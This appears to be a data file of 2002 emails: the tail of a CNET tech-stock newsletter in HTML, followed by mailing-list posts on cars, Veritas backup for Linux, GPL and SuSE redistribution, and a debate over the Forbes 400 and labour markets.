 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzz4g_jabman8WccrYnR" &gt;BINX&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;25.81%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSIVOp4-Hcoh57BymNzeR" &gt;CYCL&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.759&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;23.67%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72QL4pe0O9U4lR0vdksR" &gt;ASGN&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-38.48%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=69-CY-iIoWgaO4V_QyMoAH4OpRzLxFR" &gt;PLUM&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.2&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-28.87%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7HiFWVi6pURwMpopr9R" &gt;QFAB&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.92&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-28.53%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3VjS0HHcTYjvQ8Rgn5rR" &gt;SONT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.16&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-26.28%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkruyXLH6DtZs6swzdONiR" &gt;RAZFD&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.511&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-13.09%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers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href="http://clickthru.online.com/Click?q=be-B7ixQCpTpl-DNQJbnY9y52GfwH4R" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBmiHV3K74p01K7fy3rR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQBEeairAP_kMFIM55iR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1renylTO_Iti64Q9t8PR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrdXcG9-pEvKY-qkCKnR"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16,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href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9ZnMclSkMRUVolYrBeR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8473.11 &amp;nbsp;&lt;font color=#cc0000&gt;-166.08&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1bMZN2gY0VXXjhrHNHyR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1375.26 &amp;nbsp;&lt;font color=#cc0000&gt;-7.36&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxzX2HKEJlh9GpMUHM3FR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;900.94 &amp;nbsp;&lt;font color=#cc0000&gt;-16.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyTVwpeWhKPAKa1CPIuR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;992.91 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-12.40&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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slump with Intel&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 With investors selling Intel shares before its post-market close earnings announcement, technology stocks dropped Tuesday.
 &lt;p&gt;
 Despite generally upbeat remarks on the economy by Fed Chair Alan Greenspan and news of a profitable quarter from Nextel Communications, CNET's Tech index slipped 12.4 points, or 1.25 percent, to 992.91. The tech-laden Nasdaq composite index fell 7.36 points, or 0.53 percent, to 1,375.26.
 &lt;p&gt;
 Worse-than-expected earnings from construction machinery maker Caterpillar helped depress broader markets. The Dow Jones industrial average lost 166.0 points, or 1.92 percent, to 8,473.1--for its seventh consecutive losing session. The S&amp;P 500 shed 16.99 points, or 1.85 percent, to 900.94--another multi-year low.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href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc35hZULfLHDx1984BOsR" &gt;Microsoft reveals media XP details &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Microsoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
 Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.&lt;br&gt;&lt;B&gt;MICROSOFT CORP 51.25 -1.06% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQKUSVrMzb-Byo4hJdlR" &gt;Intel layoffs possible&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Chipmaker Intel may be on the verge of announcing massive layoffs or other cuts amid a slow market for personal computers, according to reports.
 Intel CEO Craig Barrett is scheduled to speak to employees after stock markets close Tuesday, according to The Wall Street Journal. At about the same time, the chipmaker will discuss its second-quarter results on a conference call with analysts.&lt;br&gt;&lt;B&gt;INTEL CORP 18.36 -3.97% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOfc7MtOvAKcnvjbgw4R" &gt;Nextel Turns Profitable, Revenues Jump &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Nextel Communications Inc., the nation's No. 5 wireless telephone company, on Tuesday said it turned profitable in its second quarter, driven by strong customer demand that translated to a 25 percent revenue increase.
 Nextel also said it expected 2002 operating cash flow of at least $3 billion compared with an earlier forecast calling for $2.5 billion.&lt;br&gt;&lt;B&gt;NEXTEL COMMUNIC'NS'A' 6.53 30.6%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href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wvbAuaRaT-Dc13yE_rR"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href="http://clickthru.online.com/Click?q=d1-ulOzQpErJt-obd110-kl0aSxkZlR" &gt;Banc of America Securities begins coverage of Power Integrations with a "market performer" rating in tech notes 7/16/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Douglas Lee says the maker of power supply integrated circuits is building a market niche with a more efficient and reliable technology than traditional approaches to converting AC-to-DC power supplies. He also notes Power Integrations is expanding its market with DC-to-DC power supply products, and says the firm's growth is based on converting today's power supplies to its more efficient technologies. As a result, the company doesn't need a boost in end-market demand to grow, Lee says. Although he sees a large, untapped market for Power Integrations and likes its long-term prospects, Lee suggests the stock is fairly valued. He believes shares of POWI are unlikely to rise much in the short term.&lt;br&gt;&lt;B&gt;POWER INTEGRATIONS 18.72 5.23% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDK8EzrrXGugH6NQYvU4R"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href="http://clickthru.online.com/Click?q=fb-aWErQkgqrbMJ--6oFokcTbTDoVrR" &gt;French TV exec says Vivendi tapped him for CFO &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
  A French television executive said on Tuesday he had been approached about taking over as finance chief at beleaguered media giant Vivendi Universal -- and acknowledged the job would be a "challenge."
 Jacques Espinasse, chief operating officer at French satellite TV consortium TPS, has been cited by the French press as a candidate for the financial hot seat at Vivendi, which is grappling with cash and debt problems in the wake of the sacking earlier this month of chairman Jean-Marie Messier.&lt;br&gt;&lt;B&gt;VIVENDI UNIVERSAL 15.38 -5.06% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAl5hqOPffACEH5fCAiR"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href="http://clickthru.online.com/Click?q=25-inepIbdXXmgT9-OZTscR7jeQrFPR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8bZfix7JR1rqAFZcCnR"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href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vQD4jv8g-rrsLKFK0uR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZ0dIfsNGWF8w6YrPhsR"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href="http://clickthru.online.com/Click?q=79-rsQHIEBf9L2XNnwmFz_e0CvgpaFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTtNI4tPDuYWD0V_Wy4R" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6pafXa5wrq463LvvI2rgYyR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXLuUAYh8FdMkmoOwzlR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOozpVYZ3ufz1Jey2fP4R" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8ASTim3-JM2mPpt29erR"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href="http://clickthru.online.com/Click?q=f8-57BSQfsXnXRqAf3piaRL6DCwoliR"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href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGSAqjfNv0T0QkY6b7PR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_FCVX0uo4I9yc99NcnR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=38-bL1mzdM6ESXNckCEuJP4Z-nwcb_HPdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDjxn-JUQdaB0S22bbKAZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOEd44dG9TmIKJ15BRdR"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href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMgNe70x31g9NPmdZPuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhMU1tkNVFm8il40AWNyR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKI25MMceGkeHaXeD3gBlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyZLn1jc5T_PUCch20Lg4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-7pF0qGyXYHRf_uaHkrR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDHKmkSSw7kPhB7mxUT9AiR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=f8-57ES-QsQKTrbF_GI6V9WiKXfedRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Best bang for the buck:  390 hp Mustang Cobra @ $35k.
 GG, recently emerged from the passenger side of a 2003 with the largest
 smile.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Joseph S. Barrera III
 Sent: Sunday, December 01, 2002 1:40 PM
 To: fork@spamassassin.taint.org
 Subject: Re: Mercedes-Benz G55
 On the other end of the spectrum, I just bought a Honda del Sol
 for my new commute to San Jose (from San Bruno)... I wonder if
 it would fit in the cargo area of a G55.
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] veritas backup on linux ?
</t>
  </si>
  <si>
    <t xml:space="preserve"> I've a solaris box &amp; a windows 2000 box, both with DLT drives, controlled
 by Veritas Backup.
  Can I install some sort of client on the linux box to enable it to be
 backed up ? A browse of the Veritas site is a little quiet on this front.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):
 &gt; What is the GPL all about then?
 (1) I'm sure you are not _actually_ under the delusion that everything
 on a typical Linux distribution issued subject to the terms of the GNU
 GPL.  For one thing, it seems difficult to imagine you _not_ being aware
 that XFree86 is under the X/MIT licence, that Perl is under the Perl
 Artistic Licence, that Apache is under the Apache licence, and that
 numerous BSD utilities are under the BSD licence.
 Furthermore, xv, Acrobat Reader, pine, pico, Netscape Communicator, and
 a whole slew of other applications typically included aren't under any
 open source licence at all, but rather are proprietary.
 (2) You seem, in any event, to be under a misconception as to what the
 GPL provides, as to code under its umbrella.  It says (in part) that
 _if_ you have lawfully received a copy of covered binary code, then you
 may insist on one of certain forms of access to the matching source
 code.  Please note that it does _not_ guarantee you any rights
 whatsoever if nobody's decided to give you a lawful copy.
 &gt; But *_surely_* they cannot BSD Linux? It's not theirs to BSD!
 Again, you seem to be under a misconception.  If you check, I'm quite
 confident you'll see that SuSE are in full compliance with GPL v. 2's
 source-code access provisions concerning GPLed code included in their
 distribution.  And no, nobody has the legal right to alter licence terms
 to someone else's copyrighted property.  But you have not cited any
 reasons to believe that SuSE have done any of those things.
 &gt; Fine - nobody can oblige SuSE to do anything other than put up the ftp
 &gt; version, but surely they can't prevent a CD owner from burning a copy
 &gt; and giving it to me?
 See below.  You and the CD owner would be committing copyright violation.
 SuSE Linux AG are rather unlikely to knock down your door and haul you
 down to a judge, if that's what you're asking.
 &gt; Nobody can oblige them to give away anything other than ftp - I'm not
 &gt; asking for that. I'm asking for somebody who has Linux (GPL'ed) to
 &gt; burn a copy for me and give it to me in exchange for a reasonable
 &gt; consideration (say, the price of the CDs and a bottle of Frascati or a
 &gt; couple of pints?).
 You appear confused between Linux the kernel (which is a copyrighted
 work to which source code access is guaranteed under the GNU GPL if
 you've received a lawful copy of a binary version) and the rather
 imprecise concept of a "Linux distribution", which is a number of works
 under diverse licence terms collected onto some media.
 In the case of SuSE's boxed sets -- which are NOT lawful to duplicate
 and redistribute in their entirety -- at least a couple of the
 applications on them (YaST, YaST2, and the installer program) are
 proprietary copyrighted works of SuSE Linux AG.  In the general case,
 duplicating and redistributing CD-ROMs containing those works is
 copyright infringement.  Illegal.  No amount of hand-waving about the
 GNU GPL is going to change that.
 (SuSE permit people to duplicate and redistribute the "evaluation" and
 "live-eval" CD editions, despite that fact, as long as it is not "for
 value".)
 If you want to have a SuSE boxed set to install from, buy one.
 &gt; What does the GPL mean now?
 Suggestion:  Read it.  I would guess you've not yet done so.
 -- 
 Cheers,                                             Live Faust, die Jung.
 Rick Moen
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga wrote:
 &gt;-----BEGIN PGP SIGNED MESSAGE-----
 &gt;Hash: SHA1
 &gt;
 &gt;At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt;
 &gt;
 &gt;  
 &gt;
 &gt;&gt;Most of them seem to have Ivy League educations, or are Ivy League
 &gt;&gt;dropouts suggesting to me that they weren't exactly poor to start
 &gt;&gt;with.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Actually, if I remember correctly from discussion of the list's
 &gt;composition in Forbes about five or six years ago, the *best* way to
 &gt;get on the Forbes 400 is to have *no* college at all. Can you say
 &gt;"Bootstraps", boys and girls? I knew you could...
 &gt;  
 &gt;
 Sure - discussion in Forbes - rigorous research, that. Especially when 
 the data in their own list
 contradicts them. I continue to look at the list and all the "inherited, 
 growed" entries. I guess if
 I read it enough times my vision will clear.
 &gt;[Given that an undergraduate liberal arts degree from a state school,
 &gt;like, say, mine, :-), is nothing but stuff they should have taught
 &gt;you in a government-run "high" school, you'll probably get more of
 &gt;*those* on the Forbes 400 as well as time goes on. If we ever get
 &gt;around to having a good old fashioned government-collapsing
 &gt;transfer-payment depression (an economic version of this summer's
 &gt;government-forest conflagration, caused by the same kind of
 &gt;innumeracy that not clear-cutting enough forests did out west this
 &gt;summer :-)) that should motivate more than a few erst-slackers out
 &gt;there, including me, :-), to learn to actually feed themselves.]
 &gt;
 &gt;
 &gt;The *next* category on the Forbes 400 list is someone with a
 &gt;"terminal" professional degree, like an MBA, PhD, MD, etc., from the
 &gt;best school possible.
 &gt;
 &gt;Why? Because, as of about 1950, the *best* way to get into Harvard,
 &gt;for instance, is to be *smart*, not rich. Don't take my word for it,
 &gt;ask their admissions office. Look at the admissions stats over the
 &gt;years for proof.
 &gt;  
 &gt;
 I, at on point, looked into Stanford Business School. After learning 
 that tuition was &gt; 20K,
 no financial aid was available, and part-time work was disallowed, this 
 smart person decided
 that I was not willing to spend the $150 application fee 
 (non-refundable). During attendance at
 my local business school, I was told repeatedly I should have gone for 
 it - to quote a prof, (Northwestern MBA), it
 has nothing to do with the education you receive - in general European 
 (and Canadian) business
 schools are better and more innovative - its the connections. He used 
 the words "American nobility."
 &gt;Meritocracy, American Style, was *invented* at the Ivy League after
 &gt;World War II. Even Stanford got the hint, :-), and, of course,
 &gt;Chicago taught them all how, right? :-). Practically *nobody* who
 &gt;goes to a top-20 American institution of higher learning can actually
 &gt;afford to go there these days. Unless, of course, their parents, who
 &gt;couldn't afford to go there themselves, got terminal degrees in the
 &gt;last 40 years or so. And their kids *still* had to get the grades,
 &gt;and "biased" (by intelligence :-)), test scores, to get in.
 &gt;  
 &gt;
 "invented" being the right word. Dubya went to Yale and HBS. I guess 
 "practically" gets you
 around that problem.
 &gt;
 &gt;The bizarre irony is that almost all of those people with "terminal"
 &gt;degrees, until they actually *own* something and *hire* people, or
 &gt;learn to *make* something for a living all day on a profit and loss
 &gt;basis, persist in the practically insane belief, like life after
 &gt;death, that economics is some kind of zero sum game, that dumb people
 &gt;who don't work hard for it make all the money, and, if someone *is*
 &gt;smart, works hard, and is rich, then they stole their wealth somehow.
 &gt;
 &gt;BTW, none of you guys out there holding the short end of this
 &gt;rhetorical stick can blame *me* for the fact that I'm using it to
 &gt;beat you severely all over your collective head and shoulders. You
 &gt;were, apparently, too dumb to grab the right end. *I* went to
 &gt;Missouri, and *I* don't have a degree in anything actually useful,
 &gt;much less a "terminal" one, which means *I*'m broker than anyone on
 &gt;this list -- it's just that *you*, of all people, lots with
 &gt;educations far surpassing my own, should just plain know better. The
 &gt;facts speak for themselves, if you just open your eyes and *look*.
 &gt;There are no epicycles, the universe does not orbit the earth, and
 &gt;economics is not a zero-sum game. The cost of anything, including
 &gt;ignorance and destitution, is the forgone alternative, in this case,
 &gt;intelligence and effort.
 &gt;
 &gt;[I will, however, admit to being educated *waay* past my level of
 &gt;competence, and, by the way *you* discuss economics, so have you,
 &gt;apparently.]
 &gt;
 &gt;  
 &gt;
 Its interesting but in this part of the World (Nova Scotia) a recent 
 study found that college graduates
 earn less than graduates of 2 year community colleges (trade schools). 
 They did decline to mention
 that the demand for some trades  is so great that some of
 them are demanding university degrees to get in. Just for the record - 
 the average salary for
 a university graduate (including advanced degree holders) here is C$ 
 21,000  -- &lt; $14,000 US. No wonder
 half of San Francisco has set up here - we have a whole whack of call 
 centers that
 have arrived here in the last couple of years - I think they hire some 
 entry level IT people for around $10 ($6 US) an
 hour, which of course, fits perfectly for me - my entry level job, in 
 1986, paid $11.00 an hour. The fundamental difference
 is that most of the jobs that require a trade are *unionized*.In other 
 words, in this part of the world, for the vast majority of people, 
  union dues are a better investment than tuition. The counter-argument 
 to this is that many college graduates
  leave for better work elsewhere, but the counter-counter argument is 
 that we are the thin edge
 (one of several really - prison labor in the US would be another) of 
 third-world wages and work practices coming
  to North America.
 I worked at a company that had a 14-year wage freeze. The fact that they 
 could maintain that (and prosper) just says
  volumes about the economy in this part of the world. I met many people 
 there, like me, who felt that was fine, I can vote
 with my feet. They didn't quite realize that just about every large 
 employer in the area has similar, or worse, policies. Anyway
 eventually they started a union drive. During the vote, retired 
 employees were brought in by the employer (rumours were
 that they were paid the going rate for a vote around here - a bottle of 
 rum) and somehow allowed to vote . The union filed
  a grievance - which was denied - by a Minister of Labour, who, hey, 
 guess what - used to be a VP at the company.
 That's free labor markets at work. The business continues to prosper - 
 as I was told when I was there -  it is a cash cow as long
 as the JOA (Joint Operating Agreement) with the competing paper is in 
 place.
 And if you think that any of those wonderful American companies, out of 
 some free-enterprise belief in competing for the best talent,
 are going to do anything about that, sorry, most of them received 
 generous subsidies, in return, I'm sure, for an understanding about
 the labor markets here.
 &gt;
 &gt;BTW, if we ever actually *had* free markets in this country,
 &gt;*including* the abolition of redistributive income and death taxes,
 &gt;all those smart people in the Forbes 400 would have *more* money, and
 &gt;there would be *more* self-made people on that list. In addition,
 &gt;most of the people who *inherited* money on the list would have
 &gt;*much* less of it, not even relatively speaking. Finally, practically
 &gt;all of that "new" money would have come from economic efficiency and
 &gt;not "stolen" from someone else, investment bubbles or not.
 &gt;
 &gt;That efficiency is called "progress", for those of you in The
 &gt;People's Republics of Berkeley or Cambridge. It means more and better
 &gt;stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 &gt;apparently not worthy of teaching by the educational elite, or you'd
 &gt;know about it by now. In economic terms, it's also called an increase
 &gt;in general welfare, and, no, Virginia, I'm not talking about
 &gt;extorting money from someone who works, and giving it to someone who
 &gt;doesn't in order to keep them from working and they can think of some
 &gt;politician as Santa Claus come election time...
 &gt;  
 &gt;
 Much as I like to accept what you say - I do believe in free markets , I 
 have difficulty finding any - except of course for
 labor markets, which governments go to great lengths to protect (well 
 unless the supply is tight)
 It was a great run with the technology industry - producing most of the 
 self-made billionaires on
 the list, but now we've got a government-sponsored monopoly, and the 
 concept of "more stuff, cheaper"
 which it has always promised - seems to be disappearing. A particularly 
 galling example is
 high-speed internet access. An article I read a couple of years ago that 
 it is an area where the pricing
